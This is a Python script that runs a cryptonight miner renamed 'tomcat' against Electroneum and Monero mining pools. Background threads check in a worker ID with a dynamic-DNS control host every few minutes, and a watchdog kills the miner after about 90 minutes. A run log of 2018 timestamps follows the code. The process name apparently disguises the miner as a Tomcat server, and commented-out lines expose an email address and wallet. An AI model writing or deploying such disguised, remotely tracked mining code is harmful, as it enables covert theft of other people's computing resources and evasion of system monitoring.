import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:29:01.402286
#2018-02-17 16:15:07.066151
#2018-02-17 18:04:03.874194
#2018-02-17 19:51:07.619021
#2018-02-17 21:38:07.153878
#2018-02-17 23:22:03.745050
#2018-02-18 01:11:06.601205
#2018-02-18 02:58:05.327820
#2018-02-18 04:47:04.100995
#2018-02-18 06:38:07.092880
#2018-02-18 08:27:06.235275
#2018-02-18 10:14:06.861993
#2018-02-18 12:00:10.660148
#2018-02-18 13:45:06.206199
#2018-02-18 15:36:05.283198
#2018-02-18 17:24:07.525824
#2018-02-18 19:13:03.590502
#2018-02-18 21:00:01.626806
#2018-02-18 22:45:01.552857
#2018-02-19 00:34:05.451307
#2018-02-19 02:19:01.244320
#2018-02-19 04:07:05.707743
#2018-02-19 05:51:01.223201
#2018-02-19 07:38:07.086427
#2018-02-19 09:27:07.551173
#2018-02-19 11:16:06.757106
#2018-02-19 13:04:01.556584
#2018-02-19 14:51:08.289212
#2018-02-19 16:41:07.876196
#2018-02-19 18:28:05.492517
#2018-02-19 20:14:05.043945
#2018-02-19 22:04:06.303754
#2018-02-19 23:51:06.295927
#2018-02-20 01:39:07.060402
#2018-02-20 03:27:06.711096
#2018-02-20 05:13:07.306812
#2018-02-20 06:57:03.592632
#2018-02-20 08:44:06.091999
#2018-02-20 10:28:09.338780
#2018-02-20 12:15:06.481900
#2018-02-20 14:04:06.962592
#2018-02-20 15:48:15.742998
#2018-02-20 17:36:01.755303
#2018-02-20 19:23:04.760942
#2018-02-20 21:13:06.598043
#2018-02-20 22:59:05.221941
#2018-02-21 00:43:03.797360
#2018-02-21 02:29:04.460670
#2018-02-21 04:16:06.608838
#2018-02-21 06:03:01.874479
#2018-02-21 07:49:05.537384
#2018-02-21 09:36:01.646095
#2018-02-21 11:24:08.841521
#2018-02-21 13:14:08.575345
#2018-02-21 15:00:11.692178
#2018-02-21 16:49:09.790679
#2018-02-21 18:39:06.894248
#2018-02-21 20:25:08.089983
#2018-02-21 22:14:07.209874
#2018-02-22 00:03:06.108786
#2018-02-22 01:50:09.835740
#2018-02-22 03:37:05.249953
#2018-02-22 05:24:04.353586
#2018-02-22 07:09:03.612559
#2018-02-22 08:55:08.093967
#2018-02-22 10:43:06.556491
#2018-02-22 12:30:04.249182
#2018-02-22 14:16:04.344021
#2018-02-22 16:05:08.440425
#2018-02-22 17:51:09.234493
#2018-02-22 19:37:04.608639
#2018-02-22 21:28:02.171897
#2018-02-22 23:14:03.890436
#2018-02-23 01:01:06.466858
#2018-02-23 02:48:04.979326
#2018-02-23 04:36:05.260481
#2018-02-23 06:22:06.889635
#2018-02-23 08:09:05.247443
#2018-02-23 10:26:07.569813
#2018-02-23 12:21:05.608894
#2018-02-23 14:10:11.398632
#2018-02-23 16:02:08.178832
#2018-02-23 17:47:01.880095
#2018-02-23 19:35:05.740314
#2018-02-23 21:19:05.737086
#2018-02-23 23:07:07.550007
#2018-02-24 00:55:08.842546
#2018-02-24 02:50:01.879381
#2018-02-24 04:40:06.602824
#2018-02-24 06:24:02.126711
#2018-02-24 08:11:07.567470
#2018-02-24 09:55:08.352061
#2018-02-24 11:50:07.313907
#2018-02-24 13:42:01.716779
#2018-02-24 15:29:06.035456
#2018-02-24 17:22:06.192980
#2018-02-24 19:10:08.102234
#2018-02-24 20:58:03.992285
#2018-02-25 01:12:05.380675
#2018-02-25 04:58:05.818534
#2018-02-25 09:34:01.305920